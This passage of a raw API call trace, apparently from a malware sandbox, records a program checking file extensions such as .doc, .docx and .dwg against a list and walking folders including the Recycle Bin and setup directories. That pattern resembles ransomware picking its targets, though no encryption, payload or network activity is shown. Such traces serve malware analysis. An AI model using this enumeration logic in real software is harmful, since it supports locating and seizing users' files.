5 [0045.568] lstrcmpiW (lpString1=".djvu", lpString2="7.log") returned -1 [0045.569] lstrlenW (lpString=".dng") returned 4 [0045.569] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0045.569] lstrlenW (lpString=".doc") returned 4 [0045.569] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0045.569] lstrlenW (lpString=".docm") returned 5 [0045.569] lstrcmpiW (lpString1=".docm", lpString2="7.log") returned -1 [0045.569] lstrlenW (lpString=".docx") returned 5 [0045.569] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0045.569] lstrlenW (lpString=".dot") returned 4 [0045.569] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0045.569] lstrlenW (lpString=".dotm") returned 5 [0045.569] lstrcmpiW (lpString1=".dotm", lpString2="7.log") returned -1 [0045.569] lstrlenW (lpString=".dotx") returned 5 [0045.569] lstrcmpiW (lpString1=".dotx", lpString2="7.log") returned -1 [0045.569] lstrlenW (lpString=".dpx") returned 4 [0045.569] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0045.569] lstrlenW (lpString=".dqy") returned 4 [0045.569] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0045.569] lstrlenW (lpString=".dsn") returned 4 [0045.569] lstrcmpiW (lpString1=".dsn", lpString2=".log") returned -1 [0045.569] lstrlenW (lpString=".dt") returned 3 [0045.569] lstrcmpiW (lpString1=".dt", lpString2="log") returned -1 [0045.569] lstrlenW (lpString=".dtd") returned 4 [0045.569] lstrcmpiW (lpString1=".dtd", lpString2=".log") returned -1 [0045.569] lstrlenW (lpString=".dwg") returned 4 [0045.569] lstrcmpiW (lpString1=".dwg", lpString2=".log") returned -1 [0045.569] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0045.569] FindNextFileW (in: hFindFile=0x4260288, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0045.569] FindClose (in: hFindFile=0x4260288 | out: hFindFile=0x4260288) returned 1 [0045.585] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0045.585] FindNextFileW (in: hFindFile=0x4260548, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0045.585] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4261060 [0045.585] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260748 [0045.679] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.679] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0045.679] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0045.680] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0045.680] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0045.680] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0045.680] FindNextFileW (in: hFindFile=0x4260748, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0045.682] FindClose (in: hFindFile=0x4260748 | out: hFindFile=0x4260748) returned 1 [0045.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0045.683] FindNextFileW (in: hFindFile=0x4260548, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0045.683] FindClose (in: hFindFile=0x4260548 | out: hFindFile=0x4260548) returned 1 [0045.683] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.684] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0045.684] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4261060 [0045.684] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x4260188 [0045.794] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0045.794] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0045.794] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.794] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260448 [0045.794] FindNextFileW (in: hFindFile=0x4260448, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.794] FindNextFileW (in: hFindFile=0x4260448, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.794] FindNextFileW (in: hFindFile=0x4260448, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.794] FindClose (in: hFindFile=0x4260448 | out: hFindFile=0x4260448) returned 1 [0045.795] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.795] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0045.795] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.795] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42605c8 [0045.795] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.795] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.795] FindNextFileW (in: hFindFile=0x42605c8, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0045.795] FindClose (in: hFindFile=0x42605c8 | out: hFindFile=0x42605c8) returned 1 [0045.795] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.795] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0045.795] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0045.795] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0045.796] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0045.796] FindNextFileW (in: hFindFile=0x5e9398, lpFindFileData=0x348fcf8 | out: lpFindFileData=0x348fcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0045.796] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4261060 [0045.796] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\*", lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x4260308 [0045.817] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0045.818] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1025", cAlternateFileName="")) returned 1 [0045.819] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.819] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260808 [0045.820] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.820] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.820] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.820] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.820] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.821] FindClose (in: hFindFile=0x4260808 | out: hFindFile=0x4260808) returned 1 [0045.821] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4250050 | out: hHeap=0x5d0000) returned 1 [0045.821] FindNextFileW (in: hFindFile=0x4260308, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0045.821] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4250050 [0045.821] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260788 [0045.822] FindNextFileW (in: hFindFile=0x4260788, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.822] FindNextFileW (in: hFindFile=0x4260788, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, 